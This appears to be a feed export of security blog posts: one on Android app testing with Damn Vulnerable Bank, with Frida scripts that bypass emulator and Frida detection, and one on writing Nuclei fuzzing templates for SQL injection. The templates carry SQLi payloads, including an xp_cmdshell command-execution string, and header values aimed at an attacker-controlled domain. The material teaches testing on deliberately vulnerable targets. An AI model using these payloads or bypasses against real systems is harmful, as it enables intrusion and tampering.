[Installing Android-x86 on Proxmox and Proxying to BurpSuite](https://benheater.com/installing-android-x86-on-proxmox-and-proxying-to-burpsuite/)

Alternatively, if you prefer using VMware instead of Proxmox, the same instructions apply with slight modifications for the VMware environment. Once your virtual machine is ready, we&apos;ll proceed with installing the application.

# Getting to Know Damn Vulnerable Bank

**Damn Vulnerable Bank** is more than just an app—it&apos;s a unique learning tool designed for anyone curious about mobile security. Think of it as your playground for discovering the ins and outs of app security without any real-world risks. This Android app simulates a banking environment filled with deliberate security flaws, providing a perfect, legal sandbox for you to test your hacking skills and learn about vulnerabilities in a hands-on way.

[GitHub - rewanthtammana/Damn-Vulnerable-Bank: Damn Vulnerable Bank is designed to be an intentionally vulnerable android application. This provides an interface to assess your android application security hacking skills.](https://github.com/rewanthtammana/Damn-Vulnerable-Bank?tab=readme-ov-file)

#### **What&apos;s Under the Hood?**

Let’s break down the tech stack of Damn Vulnerable Bank:

-   **Java and Kotlin:** These are the main languages used to bring the app to life, handling everything from the user interface to the complex logic behind the scenes.
-   **SQLite:** This is where all your data magic happens—user information, transaction details, you name it—all stored safely on your local device... or so you&apos;d hope!
-   **Android SDK:** This toolkit is the backbone that helps the app interact seamlessly with your Android device’s hardware and software.
-   **REST API:** The bridge between the app and its backend server, managing all the data exchanges that aren’t handled directly on your device.

These technologies are widely used in real-world apps but often come with their share of misconfigurations and outdated practices, making Damn Vulnerable Bank a great model to learn from.

#### **Key Features to Explore**

Damn Vulnerable Bank is packed with features that mimic a real banking app:

-   **User Authentication:** This includes everything from logging in to managing sessions. It sounds simple, but there&apos;s a lot that can go wrong if not done correctly.
-   **Account Management:** Check balances, transfer money, and set up payments—standard bank stuff that we&apos;ll dive into to uncover potential risks.
-   **Transaction Security:** Features like OTPs (One-Time Passwords) add an extra layer of security for transactions. We&apos;ll see how secure these really are when put to the test.
-   **Administrative Functions:** Reserved for the &apos;big bosses&apos; of the app, these functions allow control over user accounts and other critical settings.

Each of these features not only makes the app useful, but also a goldmine for learning about common security pitfalls and how to avoid or exploit them in the name of education.

#### **Why This Matters**

In essence, Damn Vulnerable Bank is your go-to resource if you’re keen to dive deep into the world of app security. It’s set up to help you understand and tackle real security challenges faced by apps today, all in a fun and safe environment.

## Installation of the application

To install the application, we can utilize ADB, a versatile tool discussed in the article referenced during the lab setup. ADB enables various administrative operations on Android systems.

```bash
adb connect &lt;ip&gt;
adb shell

```

![](/content/images/2024/04/image-30.png)

Installing the apk via adb

After installation, by navigating to our applications, the new app will be clearly visible within the system.

![](/content/images/2024/04/image-31.png)

Application display

## Decompilation of the application

One issue that arises when attempting to open the application is that it immediately closes. I&apos;ve chosen this particular application to teach Android device hacking because it incorporates defense mechanisms that mimic real-world scenarios, thus providing a more authentic learning experience.

In such cases, we need to engage in some reverse engineering to understand the application&apos;s architecture. APKTool, an open-source utility, is instrumental for decompiling and recompiling APK files—the installation packages for Android apps. It extracts XML and .dex files from APKs and converts these .dex files into smali, a low-level intermediate representation of Dalvik bytecode used by the Android Virtual Machine. This transformation grants access to the Android app&apos;s source code at the bytecode level, allowing for precise modifications. However, working with smali is inherently complex as it is closer to machine code than high-level Java, making it more challenging to read and comprehend. Later in this chapter, we will discuss techniques to convert the code back to Java for more straightforward analysis and modifications.

![](/content/images/2024/04/image-32.png)

Decompilation using apktool

![](/content/images/2024/05/image-2.png)

Example code in smali

Post-decompilation, we&apos;ll conduct an in-depth analysis of the application&apos;s components. Typically, the initial step involves examining the &quot;AndroidManifest.xml&quot; file, a critical element within any Android app. It acts as a roadmap, detailing vital information to the operating system about the application, including package name, version, required permissions, activities, services, broadcast receivers, and more.

![](/content/images/2024/04/image-47.png)

AndroidManifest.xml

In this scenario, since we&apos;re operating in a virtual environment, we will disable the hardware acceleration setting, which could be causing the application to crash. Setting its value to &apos;false&apos; should rectify the issue.

![](/content/images/2024/04/image-33.png)

Disabling GPU acceleration

Subsequently, we will uninstall the current application and compile a new APK with the hardware acceleration disabled:

```bash
adb uninstall com.app.damnvulnerablebank

```

```bash
apktool b dvba/ -o dvba-no-gpu.apk

```

## Signing the application

Attempting to install the newly compiled APK without GPU configuration will result in an error, as the application lacks a necessary security certificate. To resolve this, we&apos;ll create a keystore containing both a public and a private key:

![](/content/images/2024/04/image-35.png)

Attempt to install the application without signature

![](/content/images/2024/04/image-36.png)

&lt;details&gt;
&lt;summary&gt;Key generation&lt;/summary&gt;

```bash
keytool -genkey -v -keystore my-release-key.keystore -alias dvba-no-gpu.apk -keyalg RSA -keysize 2048 -validity 10000

```
&lt;/details&gt;


Next, we&apos;ll use jarsigner to sign the application using the keys we just generated:

```bash
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore dvba-no-gpu.apk dvba-no-gpu.apk

```

This process will allow you to install the application without encountering security errors. However, you may find that the application still closes immediately upon opening, suggesting the presence of another defense mechanism designed to thwart operation on rooted or emulated mobile devices.

## Reverse engineering

To address the immediate closure of the application upon opening, we need to delve into reverse engineering again. The first step is to decompile the application and retrieve the Java source code. For this, ApkX is an excellent choice. Unlike other tools that convert .dex files into lower-level formats like smali (apktool for example), ApkX directly decompiles these files back into Java. This approach provides a code representation that is much closer to the original, making it easier to read, understand, and modify. ApkX not only efficiently unpacks APKs and extracts files and resources but also uses advanced techniques to reconstruct a high-level overview of the application’s functionality, offering quick insights into its coding structure.

[GitHub - muellerberndt/apkx: One-Step APK Decompilation With Multiple Backends](https://github.com/muellerberndt/apkx)

![](/content/images/2024/04/image-38.png)

Use of APKx to decompile

Next, we need to identify the root cause of the application&apos;s behavior. Using tools like grep to search through the code can be highly effective. In this instance, searching for the term &quot;Emulator&quot; reveals relevant matches.

![](/content/images/2024/04/image-39.png)

Measurement detection against systems that are being Emulated

Examining the &quot;MainActivity.java&quot; file, it becomes apparent that the application is designed to terminate if it detects that the device is rooted or if tools like Frida are in use.

![](/content/images/2024/04/image-45.png)

Code to be executed in case of Frida detection or Emulation

To resolve the issue with the application, we have two options. One approach is to comment out the code that triggers the termination and recompile the application to create a patched version. The alternative, which we will pursue, is to use Frida to dynamically patch the application during runtime, circumventing the need for permanent modifications to the code.

Frida is a dynamic instrumentation toolkit widely used for debugging and analyzing application behaviors across various platforms, including Windows, macOS, Linux, iOS, and Android. It allows developers and security researchers to inject custom scripts into running processes to monitor, modify, and probe their internal operations. This is especially useful for identifying security vulnerabilities, diagnosing issues, or understanding complex software functionalities. Frida operates by attaching to the application process and provides a framework for executing real-time code snippets, intercepting function calls, and manipulating data and control flows within the app. Its capabilities make it an invaluable tool for dynamic analysis and reverse engineering tasks.

## Introduction to Frida

To begin using Frida for Android security auditing, the first step is to ensure the Frida server is running on the Android device. To determine the correct version of Frida server needed for your device or emulator, execute the following command:

```bash
adb connect &lt;ip&gt;
adb shell
uname -m 

```

![](/content/images/2024/05/image-3.png)

Architecture of my machine

Based on the architecture returned by the command, select the appropriate Frida server version.

[Release Frida 14.1.3 · frida/frida](https://github.com/frida/frida/releases/tag/14.1.3)

![](/content/images/2024/04/image-42.png)

Version selected in my case

After determining the correct version, the next step involves transferring the Frida server binary to the Android device using the ADB tool. Here’s how you can upload the binary:

```bash
adb push frida-server /sdcard
adb shell
su
cp sdcard/frida-server /data/local/
chmod +x /data/local/frida-server
/data/local/frida-server -l 0.0.0.0:27042

```

Once Frida server is running, you can operate Frida from your machine. In the following example I have listed different processes that are running on the mobile phone.

![](/content/images/2024/05/image.png)

Verifying that Frida is running correctly

The next crucial phase is crafting a Frida script that dynamically patches the application based on your specific needs. This aspect of an Android audit is incredibly powerful, as it allows you to modify virtually any behavior of the application, provided you understand the code.

We’ll use JavaScript for scripting. Below is a sample script with comments to guide you. This script changes the return value of a method so that the application does not terminate on an emulator:

```javascript
setTimeout(function() {
    Java.perform(function() {
        var className = &quot;a.a.a.a.a&quot;; // Ensure this is the correct class name

        try {
            var targetClass = Java.use(className);
            console.log(&apos;Class loaded:&apos;, className); // Confirmation that the class is loaded

            // Ensure that the method R exists before attempting to hook it
            if (targetClass.R) {
                var originalMethod = targetClass.R.implementation;

                targetClass.R.implementation = function() {
                    // Direct call to the original implementation within the new implementation
                    var originalReturnValue = this.R();
                    console.log(&quot;Original return value =&quot;, originalReturnValue); // Debug for original value

                    return !originalReturnValue; // Negate the original return value
                };

                console.log(&quot;Method &apos;R&apos; has been successfully hooked.&quot;);
            } else {
                console.log(&quot;Method &apos;R&apos; not found in class &quot; + className);
            }
        } catch (e) {
            console.log(&quot;Error while trying to hook the class or method:&quot;, e);
        }
    });
}, 10);

```

The effectiveness of the script is confirmed when we detect that the method returns `True`, leading to the application&apos;s termination. By altering it to `False`, we bypass this issue. However, the application still terminates because it detects the use of Frida:

```bash
frida -U -l bypass-detection.js -f com.app.damnvulnerablebank

```

![](/content/images/2024/05/image-1.png)

Detection of successfully evaded emulation

To overcome this, another script is needed to manipulate the Frida detection mechanism. Below is a script that alters the return value of the Frida detection function, ensuring the application does not terminate:

```javascript
Java.perform(function () {
    console.log(&quot;looking for FridaCheckJNI.fridaCheck()&quot;);

    try {
        const FridaCheckJNI = Java.use(&apos;com.app.damnvulnerablebank.FridaCheckJNI&apos;);

        FridaCheckJNI.fridaCheck.implementation = function() {
            console.log(&quot;hooking fridaCheck().&quot;);
            var value = this.fridaCheck.call(this);
            console.log(&quot;fridaCheck() returned &quot; + value);
            console.log(&quot;switching fridaCheck() to 0&quot;);
            return 0;  // Always return 0 to bypass checks
        };
    } catch (e) {
        console.log(&quot;Failed to hook fridaCheck: &quot; + e.message);
    }
});

```

Running both scripts together with Frida finally grants access to the application, circumventing the implemented security measures:

```bash
frida -U -l bypass-detection.js -l bypass-frida-check.js -f com.app.damnvulnerablebank

```

![](/content/images/2024/04/image-46.png)

Execution of both scripts to evade all detections

![](/content/images/2024/04/image-43.png)

Successful access to the application

# Conclusions: Empowering Mobile Application Security Through &quot;Damn Vulnerable Bank&quot;

In this opening chapter of our Android security series, we&apos;ve navigated through &quot;Damn Vulnerable Bank&quot; (DVB), a simulated environment for real-world vulnerabilities. Through robust methodologies, practical labs, and detailed analyses, this chapter has enhanced our ability to identify and exploit vulnerabilities, deepening our understanding of mobile application security&apos;s importance.

Adopting the OWASP Mobile Application Security Testing Guide (MASTG) provided a clear framework for auditing, while the setup flexibility of using either a physical device or a virtual machine enabled a realistic testing environment. DVB proved invaluable in demonstrating practical security weaknesses and exploring the technology stack including Java, Kotlin, SQLite, and the Android SDK integrated with a REST API.

Advanced techniques demonstrated with tools like APKTool and ApkX, and dynamic analysis with Frida, have highlighted the necessity of proactive security practices. By the end, not only have you learned to set up and dissect application security features but also understood the nuances of recompiling and signing applications to meet security standards. &quot;Damn Vulnerable Bank&quot; has opened the door to mastering mobile application security, setting the stage for further exploration and skill enhancement in subsequent chapters. Whether you&apos;re a beginner or a seasoned professional, the insights from this chapter are essential for anyone looking to improve mobile application security.

# Resources

[Damn Vulnerable Bank](https://rewanthtammana.com/damn-vulnerable-bank/index.html)</content:encoded><author>Ruben Santos</author></item><item><title>From Chaos to Clarity: The Art of Fuzzing with Nuclei</title><link>https://www.kayssel.com/post/nuclei-templates</link><guid isPermaLink="true">https://www.kayssel.com/post/nuclei-templates</guid><description>Embarking on a cybersecurity journey, we explore creating custom Nuclei templates for detecting SQLi in POST requests, leveraging mitmproxy for testing. This endeavor enhances our digital defenses by merging Nuclei&apos;s precision with fuzzing&apos;s unpredictability.</description><pubDate>Thu, 18 Apr 2024 06:56:55 GMT</pubDate><content:encoded># Introduction

In the vast and ever-evolving universe of cybersecurity, where digital threats constantly morph and lurk in the shadows, I embark on a personal crusade to fortify our digital defenses. This installment of my blog marks the beginning of an exhilarating venture: the creation of a personal repository of custom Nuclei templates. Each template, crafted from my experiences and insights, is a key designed to unlock the mysteries of unseen vulnerabilities through the art of fuzzing. Today, we zero in on developing a specialized template to sniff out SQL Injection (SQLi) vulnerabilities in POST requests, venturing beyond mere vulnerability scanning to chart unexplored territories with Nuclei and fuzzing. Here are the main takeaways from our upcoming exploration:

-   **Advancing Cybersecurity with Nuclei:** Leveraging Nuclei&apos;s robust framework to develop custom templates that enhance our ability to detect and analyze vulnerabilities. This approach underscores the importance of precision and adaptability in our defense mechanisms.
-   **The Technical Core of SQLi Detection:** Exploring the technical nuances of crafting a Nuclei template specifically designed to detect SQLi vulnerabilities in POST requests. This includes a detailed examination of payload construction, filtering conditions, and the strategic implementation of fuzzing techniques to identify vulnerabilities that evade conventional detection methods.
-   **Integrating mitmproxy for Enhanced Testing:** Utilizing mitmproxy, a versatile tool for intercepting, inspecting, modifying, and replaying HTTP traffic, to capture and format requests in a Nuclei-compatible format. This step is crucial for setting up accurate and effective testing environments, demonstrating the synergy between various cybersecurity tools in identifying and mitigating vulnerabilities.

Join me as we delve into the nuances of crafting a Nuclei template, an exploration that is more than a tutorial—it&apos;s a testament to the commitment to bolstering our digital fortifications, one template at a time. Together, let&apos;s navigate this journey towards a more secure digital future.

# Nuclei and Fuzzing: A Quick Refresh

Remember our adventures through the digital landscape in previous chapters? We took a deep dive into the world of Nuclei in one thrilling episode, exploring how this ingenious tool acts like a digital Sherlock Holmes, meticulously sifting through web applications and networks with its template-based detection. Then, we embarked on a wild ride with fuzzing in our exploration of ffuf, where we embraced the chaos of sending a barrage of unexpected data at applications just to see what breaks. It&apos;s time to connect those dots.

[**Revisiting Nuclei**:](https://www.kayssel.com/post/nuclei/) Cast your mind back to when we first met [Nuclei.](https://github.com/projectdiscovery/nuclei) We touched on its ability to use predefined templates for vulnerability detection, making it an indispensable tool for cybersecurity professionals looking to write their own detective stories. Yes, Nuclei is that specialized scanner from Project Discovery that allows for such tailored investigations, enabling us to target specific vulnerabilities with precision. Think of it as having a highly customized magnifying glass to spot those digital clues.

[**Fuzzing - The Art of Digital Chaos, Revisited**](https://www.kayssel.com/post/hacking-web-3/): And who could forget our venture into the world of fuzzing with ffuf? We learned that fuzzing isn’t just about creating a mess; it’s a calculated strategy to unearth vulnerabilities that are so well-hidden they’re practically incognito. By challenging software with the unexpected—inputs that defy the norm—we push systems to their limits, revealing weaknesses that standard testing might miss.

As we gear up to dive deeper into leveraging Nuclei with custom templates for fuzzing, let’s not forget the ground we’ve covered. We&apos;ve seen the precision of Nuclei and the controlled chaos of fuzzing with ffuf. Now, it’s time to see how these methodologies can be combined and elevated. Our journey into the advanced use of Nuclei for discovering previously undetected vulnerabilities begins here. Buckle up; it’s going to be an insightful ride.

# Advanced Fuzzing with Custom Nuclei Templates

In the realm of cybersecurity, Nuclei stands out for its capacity to execute advanced fuzzing via custom templates. By fully leveraging Nuclei’s capabilities, security enthusiasts are equipped to conduct precise and adaptable penetration testing, uncovering vulnerabilities that have eluded detection. Let’s delve into the critical elements that endow Nuclei with such prowess in fuzzing, followed by an illustrative example of a template.

#### The Essentials of Crafting Nuclei Fuzzing Templates

**Supported Fuzzing Parts:** Nuclei templates offer the versatility to target specific segments of an HTTP request, enhancing the tool’s applicability across various fuzzing scenarios. The parts that can be targeted include:

-   **Query**: For the manipulation of query parameters.
-   **Path**: To alter URL paths.
-   **Header**: For modifying request headers.
-   **Cookie**: To adjust cookie values.
-   **Body**: Tailoring the request body&apos;s content, compatible with formats such as JSON, XML, Form, and multipart-form data.

This granularity enables the simulation of a wide array of attack vectors, enriching the fuzzing landscape.

**Rule Types:** To cater to diverse fuzzing needs, Nuclei supports a plethora of rule types for payload insertion:

-   **Prefix**: Prepending a payload before the value.
-   **Postfix**: Appending a payload after the value.
-   **Replace**: Substituting the value with a payload.
-   **Infix**: Embedding a payload within the value.
-   **Replace-regex**: Leveraging regex for sophisticated replacement operations.

These rule types provide the flexibility necessary to craft templates that can probe for an extensive range of vulnerabilities.

**Loading HTTP Traffic:** Nuclei’s ability to import HTTP traffic from various sources significantly broadens its testing scope:

-   Compatibility with tools such as Burp Suite, httpx, and Proxify.
-   Support for API schema files like OpenAPI, Swagger, and Postman collections.

These integrations ensure that fuzzing efforts closely mirror real-world traffic patterns, increasing the likelihood of uncovering critical security issues.

**Filters:** A key aspect of refining the fuzzing process is the use of filters within Nuclei templates. Filters allow for the specification of conditions under which a template is activated, based on the characteristics of the HTTP request. This targeted approach aids in minimizing unnecessary noise and focusing efforts on potentially vulnerable areas.

**Efficiency Through Abstraction:** Nuclei enhances template creation efficiency by abstracting the parts of the HTTP request into key-value pairs. This abstraction simplifies the application of fuzzing rules across different data formats, enabling broader testing capabilities with fewer templates.

#### Illustrative Template Example: Header Manipulation for Security Testing

Below is a detailed Nuclei template designed to test the security robustness of web applications by manipulating HTTP headers. This template specifically aims to identify vulnerabilities that could be exploited via header injection attacks, a technique often used in web application attacks such as HTTP Request Smuggling or Web Cache Poisoning:

```yaml
http:
  - pre-condition:
      - type: dsl
        dsl:
          - &apos;method == &quot;POST&quot;&apos;       # only run if method is POST
          - &apos;contains(path,&quot;reset&quot;)&apos; # only run if path contains the word &quot;reset&quot;
        condition: and
    # fuzzing rules
    fuzzing:
      - part: header # This rule will be applied to the header
        type: replace # replace type of rule (i.e., existing values will be replaced with payload)
        mode: multiple # multiple mode (i.e., all existing values will be replaced/used at once)
        fuzz:
          X-Forwarded-For: &quot;{{domain}}&quot;  # here {{domain}} is an attacker-controlled server
          X-Forwarded-Host: &quot;{{domain}}&quot;
          Forwarded: &quot;{{domain}}&quot;
          X-Real-IP: &quot;{{domain}}&quot;
          X-Original-URL: &quot;{{domain}}&quot;
          X-Rewrite-URL: &quot;{{domain}}&quot;
          Host: &quot;{{domain}}&quot;



```

**Template Insights:**

-   **Pre-Condition**: The template is triggered based on pre-defined conditions, ensuring it&apos;s executed for POST requests that include &quot;reset&quot; in the path. This specificity helps focus the fuzzing efforts on potentially vulnerable endpoints involved in sensitive operations like password resets.
-   **Fuzzing Rules**: The core of this template lies in its fuzzing rules, where it replaces existing header values with payloads that include a domain controlled by the attacker. This method tests the application&apos;s handling of headers and whether it&apos;s possible to manipulate the application&apos;s behavior or leak sensitive information by injecting malicious header values.
-   **Mode**: By setting the mode to &quot;multiple,&quot; the template ensures that all specified headers are modified in a single request, allowing for comprehensive testing of the application’s response to multiple, simultaneous header manipulations.

# Methodology for creating templates

### **Beginning the Template Creation Process**

To kick off the template creation, we first need to capture a typical request, such as a login attempt. This task can be accomplished using any proxy tool; in this scenario, I&apos;ve opted for mitmproxy for its ease of use and versatility.

![](/content/images/2024/04/image-20.png)

Login Portal

![](/content/images/2024/04/image-21.png)

Login request screenshot

### **Handling GET vs. POST Requests with Nuclei**

Auditing GET requests with Nuclei is fairly straightforward: we simply input the URL and, if necessary, provide authentication cookies for testing. However, auditing POST requests requires a more tailored approach due to the specific format needed for Nuclei analysis. To audit effectively with Nuclei, our captured request must be in one of the following formats: Burp, JSONL, YAML, OpenAPI, or Swagger. In this context, we&apos;ll demonstrate how to convert a request into the JSONL format using a command in mitmproxy. Should you be utilizing Burp, you have the convenience of directly copying a request in the required format.

### **Transforming Requests into Nuclei-Compatible Format**

Below is a Python snippet that defines a mitmproxy command to log URLs and, where relevant, the bodies of POST requests in a JSONL format compatible with Nuclei&apos;s requirements:

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    If you want to know more about mounting commands, I recommend you to take a look at the &lt;a href=&quot;https://www.kayssel.com/post/proxy/&quot;&gt;chapter where we talk about mitmproxy.&lt;/a&gt;
  &lt;/div&gt;
&lt;/div&gt;

```python
    @command.command(&quot;hacking.log_urls_in_nuclei_format_with_body&quot;)
    def log_urls_in_nuclei_format_with_body(self, flows: types.Sequence[flow.Flow]) -&gt; None:
        &quot;&quot;&quot;
        Logs URLs and, if applicable, POST request bodies in a JSONL format that aligns with Nuclei&apos;s expectations.
        &quot;&quot;&quot;
        export_dir = os.path.join(os.getcwd(), &quot;nuclei_formatted_urls_with_body&quot;)
        os.makedirs(export_dir, exist_ok=True)
        
        filename = &quot;nuclei_formatted_urls_with_body.jsonl&quot;
        filepath = os.path.join(export_dir, filename)

        with open(filepath, &quot;a&quot;) as file:
            for flow in flows:
                # Simplify the header and include body if the method is POST
                method = flow.request.method
                body = flow.request.get_text(strict=False) if method == &quot;POST&quot; else &quot;&quot;
                headers = {name: value for name, value in flow.request.headers.items()}
                
                # Construct the raw request string, including the body for POST requests
                raw_request_lines = [
                    f&quot;{method} {flow.request.path} HTTP/1.1&quot;,
                    *[f&quot;{name}: {value}&quot; for name, value in headers.items()],
                    &quot;&quot;,  # End of headers
                    body
                ]
                raw_request = &quot;\r\n&quot;.join(raw_request_lines)

                # Create the entry to be logged
                nuclei_entry = {
                    &quot;timestamp&quot;: datetime.now(timezone.utc).isoformat(),
                    &quot;url&quot;: flow.request.pretty_url,
                    &quot;request&quot;: {
                        &quot;header&quot;: headers,
                        &quot;raw&quot;: raw_request
                    },
                    # Omitting the response part in this example
                }

                file.write(json.dumps(nuclei_entry) + &quot;\n&quot;)
        
        ctx.log.info(f&quot;URLs and POST bodies logged in Nuclei-compatible format: {filepath}&quot;)

```

### **Utilizing the Command in Mitmproxy**

To apply the command in mitmproxy and convert a selected request into JSONL format, you can use the following command:

```bash
hacking.log_urls_in_nuclei_format_with_body @focus

```

![](/content/images/2024/04/image-22.png)

Command usage with mitmproxy

![](/content/images/2024/04/image-25.png)

Request after formatting the request

This streamlined process allows us to efficiently capture and format requests, paving the way for thorough vulnerability assessments with Nuclei.

## Creating the template

To begin with, I have taken a small template from one of the resources at the end of the article. The content is as follows:

```yaml
http:
    # filter checks if the template should be executed on a given request
  - filters:
      - type: dsl
        dsl:
          - method == POST
          - len(body) &gt; 0
        condition: and
    # payloads that will be used in fuzzing
    payloads:
      injection: # Variable name for payload
        - &quot;&apos;&quot;
        - &quot;\&quot;&quot;
        - &quot;;&quot;
    # fuzzing rules
    fuzzing:
      - part: body  # This rule will be applied to the Body
        type: postfix # postfix type of rule (i.e., payload will be added at the end of exiting value)
        mode: single  # single mode (i.e., existing values will be replaced one at a time)
        fuzz:         # format of payload to be injected
          - &apos;{{injection}}&apos; # here, we are directly using the value of the injection variable


```

### Unpacking the Nuclei Template

Imagine you’re a detective, and your job is to find the hidden doors and weak spots in a building (in our case, a web application). A Nuclei template is your map and toolkit rolled into one, guiding you where to look and what tools to use.

#### The Blueprint: Filters

First up, we have the `filters`. Think of this as your checklist before you embark on your investigation. The template specifies two main conditions under this section:

-   The method of communication must be a `POST` request, akin to sending a parcel rather than just a letter, requiring a response from the recipient.
-   The parcel (the body of the request) cannot be empty; it must contain something to probe the application&apos;s reaction.

The rule here is straightforward: both conditions must be met (`condition: and`) for our investigative tool to spring into action.

#### The Toolkit: Payloads

Next, we delve into the `payloads` section. Here, we find an array of peculiar phrases or symbols - in our case, a single quote (`&apos;`), a double quote (`&quot;`), and a semicolon (`;`). These might seem innocuous at first glance, but they&apos;re akin to picking locks in the digital world. Each one is a test to see if we can trip up the application&apos;s normal processing and reveal hidden vulnerabilities.

#### The Strategy: Fuzzing Rules

Finally, the `fuzzing` section lays out our strategy for using these tools. Here’s the breakdown:

-   We’re targeting the `body` of the request, the main content of our digital parcel.
-   We employ a `postfix` approach, adding our lock-picking tools to the end of the existing message, tweaking the message&apos;s tail to see if it unlocks any reactions.
-   Our mode of operation is `single`, meaning we test one tool at a time, giving each its moment to shine or fail, ensuring we can pinpoint exactly which tool reveals a vulnerability.
-   The `fuzz` key tells us we’re directly using our array of tools (`injection` payloads) in this operation, applying them precisely as outlined in our toolkit.

### **Launching the Template**

For execution, metadata must precede the template. Here&apos;s an example:

```yaml
id: testing-stored-xss
info:
  name: SQLi POST request
  author: rsgbengi
  severity: critical
  tags: sqli,das

```

Executing the template to detect vulnerabilities is straightforward. However, enabling debug mode and using a proxy for manual request testing is advisable:

```bash
nuclei -im jsonl -l nuclei_formatted_urls_with_body/nuclei_formatted_urls_with_body.jsonl  -debug -t sqli-post.yaml -proxy http://127.0.0.1:8888 

```

![](/content/images/2024/04/image-23.png)

The filter has not been identified

Despite encountering errors related to &quot;filters&quot; in my current Nuclei version, I&apos;ve improvised by integrating a matcher designed to identify specific keywords, albeit with a potential for false positives:

```yaml
  - matchers:
      - type: dsl
        dsl:
          - method == POST
          - len(body) &gt; 0
        condition: and
      - type: word
        name: node
        words:
          - &quot;Error&quot;
          - &quot;SQL&quot;

```

To streamline testing, I&apos;ve employed a tag to cease execution upon the first match, avoiding exhaustive combinatorial testing:

```yaml
    stop-at-first-match: true

```

&lt;details&gt;
&lt;summary&gt;The complete template I am going to use can be found here:&lt;/summary&gt;

```yaml
id: testing-sqli
info:
  name: SQLi POST request
  author: rsgbengi
  severity: critical
  tags: sqli,dast
http:
  - matchers:
      - type: dsl
        dsl:
          - method == POST
          - len(body) &gt; 0
        condition: and
      - type: word
        name: node
        words:
          - &quot;Error&quot;
          - &quot;SQL&quot;
    stop-at-first-match: true
    payloads:
      injection: 
        - &quot;&apos;&quot;
        - &quot;\&quot;&quot;
        - &quot;;&quot;
    fuzzing:
      - part: body  
        type: postfix 
        mode: single  
        fuzz:         
          - &apos;{{injection}}&apos; 
 


```
&lt;/details&gt;


If we run now with the changes made, we can see how we can indeed detect the SQLI vulnerability thanks to the word &quot;Error&quot;.

![](/content/images/2024/04/image-26.png)

Payload added at the end

![](/content/images/2024/04/image-27.png)

Identification of possible injection from &quot;Error&quot;

#### The Refined Template

Enhancing our template to reduce false positives involves incorporating more selective error messages:

```yaml
id: refined-testing-sqli
info:
  name: Refined SQLi POST Request Detection
  author: rsgbengi (refined)
  severity: critical
  tags: sqli,dast
http:
  - method: POST
    matchers:
      - type: dsl
        dsl:
          - &quot;method == &apos;POST&apos;&quot;
          - &quot;len(body) &gt; 0&quot;
        condition: and
      - type: regex
        name: sql_error
        regex:
          - &quot;You have an error in your SQL syntax;&quot;
          - &quot;Warning: mysql_fetch_assoc()&quot;
          - &quot;Unclosed quotation mark after the character string&quot;
          - &quot;ORA-[0-9]{5}&quot;
        condition: or
      - type: status
        status:
          - 500
          - 200
    payloads:
      injection:
        - &quot;&apos; OR &apos;1&apos;=&apos;1&quot;
        - &quot;1&apos; WAITFOR DELAY &apos;0:0:5&apos; --&quot;
        - &quot;&apos; EXEC xp_cmdshell(&apos;dir&apos;) --&quot;
    fuzzing:
      - part: body
        type: postfix
        mode: single
        fuzz:
          - &quot;{{injection}}&quot;
    stop-at-first-match: true

```

![](/content/images/2024/04/image-28.png)

Detection of vulnerability from error 500

In any case, you can use for example for sqli, the regex that come in this template and add more or less words as you find them:

[fuzzing-templates/sqli/error-based.yaml at main · projectdiscovery/fuzzing-templates](https://github.com/projectdiscovery/fuzzing-templates/blob/main/sqli/error-based.yaml)

On the other hand, for quick template creation, there is a burp plugin that automates a large part of the process. Here is the link in case you want to take a look at it:

[GitHub - projectdiscovery/nuclei-burp-plugin: Nuclei plugin for BurpSuite](https://github.com/projectdiscovery/nuclei-burp-plugin?tab=readme-ov-file)

# Conclusions

As we wrap up this chapter of our cybersecurity odyssey, it&apos;s clear that the fusion of Nuclei&apos;s targeted precision with the dynamic unpredictability of fuzzing opens new frontiers in the battle against digital vulnerabilities. The journey we embarked on today—starting with the crafting of a custom Nuclei template for detecting SQL Injection in POST requests—serves as a cornerstone in our ongoing quest to safeguard the digital realm.

This personal endeavor to build a repository of Nuclei templates is not just about enhancing our defensive arsenal; it&apos;s a testament to the power of collective wisdom and individual initiative in the cybersecurity community. By sharing these insights and tools, we not only strengthen our own defenses but also contribute to the broader network of digital protectors.

I encourage you to dive deeper, to explore the intricacies of Nuclei and the art of fuzzing further. The resources section below is a treasure trove of knowledge, meticulously curated to guide your journey through the complex tapestry of cybersecurity. Whether you&apos;re looking to refine your skills, seeking inspiration for your next project, or simply curious about the latest in vulnerability scanning and detection, these resources are your gateway to a wealth of information.

Let&apos;s continue to learn, to experiment, and to share. The path to mastering cybersecurity is an ever-evolving journey, filled with challenges and triumphs. By exploring the resources provided, engaging with the community, and contributing our unique insights, we not only defend against the threats of today but also prepare for the unknown challenges of tomorrow.

Thank you for joining me on this adventure. Together, let&apos;s forge ahead, armed with knowledge and innovation, in our relentless pursuit of a secure digital future.

# Resources

[Introduction to Nuclei Templates - ProjectDiscovery Documentation](https://docs.projectdiscovery.io/templates/introduction)

[Nuclei v2.8.0 - Fuzz all the way!](https://blog.projectdiscovery.io/nuclei-fuzz-all-the-way/)

[Fuzzing for Unknown Vulnerabilities with Nuclei v3.2](https://blog.projectdiscovery.io/nuclei-fuzzing-for-unknown-vulnerabilities/)

[Challenge solutions · Pwning OWASP Juice Shop](https://help.owasp-juice.shop/appendix/solutions.html)</content:encoded><author>Ruben Santos</author></item><item><title>Harnessing the Power of Nuclei: A Guide to Advanced Vulnerability Scanning</title><link>https://www.kayssel.com/post/nuclei</link><guid isPermaLink="true">https://www.kayssel.com/post/nuclei</guid><description>Nuclei, a standout in cybersecurity, offers template-driven vulnerability scanning. Enhanced by community collaboration, it&apos;s crucial for proactive defense. For deeper insights, visit Project Discovery&apos;s guide to unlock Nuclei&apos;s full potential and stay ahead in cybersecurity.</description><pubDate>Sun, 07 Apr 2024 10:46:25 GMT</pubDate><content:encoded># Introduction

In the ever-evolving landscape of cybersecurity, vulnerability scanners stand out as critical tools for protecting our digital environments. Among these essential tools, Nuclei emerges as a leading solution, characterized by its innovative approach to vulnerability detection. This guide aims to highlight the key features and functionalities of Nuclei, offering a clear roadmap for leveraging its capabilities:

-   **The Evolution of Digital Threats**: As cybersecurity challenges become more complex, the need for advanced tools like Nuclei has never been more critical.
-   **Nuclei&apos;s Distinction**: Developed by ProjectDiscovery, Nuclei differentiates itself through a template-based, community-driven approach, enabling efficient and targeted vulnerability scans.
